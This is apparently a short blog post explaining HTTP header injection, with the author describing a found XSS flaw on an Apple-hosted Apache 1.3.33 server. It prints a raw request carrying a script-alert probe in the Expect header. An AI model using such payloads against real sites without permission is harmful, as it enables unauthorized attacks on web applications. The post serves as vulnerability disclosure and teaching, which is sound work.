HTTP Header Injection Vulnerability


HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.

I recently found a similar kind of vulnerability in and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache

Kindly Bookmark this Post using your favorite Bookmarking service:
Technorati Digg This Stumble Stumble Facebook Twitter


Post a Comment

Note: only a member of this blog may post a comment.

On this website can find all possible ways of making money online or Hacking Tricks or Any other field on internet world. But before you proceed, please subscribe for our email updates, so you can get the latest news instantly. Enter your email address to receive free make money online ,Hacking ,Security,Blogging news:

Contact Us


Email *

Message *

Blog Archive



Powered by Blogger.

Recent Posts

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks

| AtiHackingTricks.blogspot.Com © 2009. All Rights Reserved |Back To Top |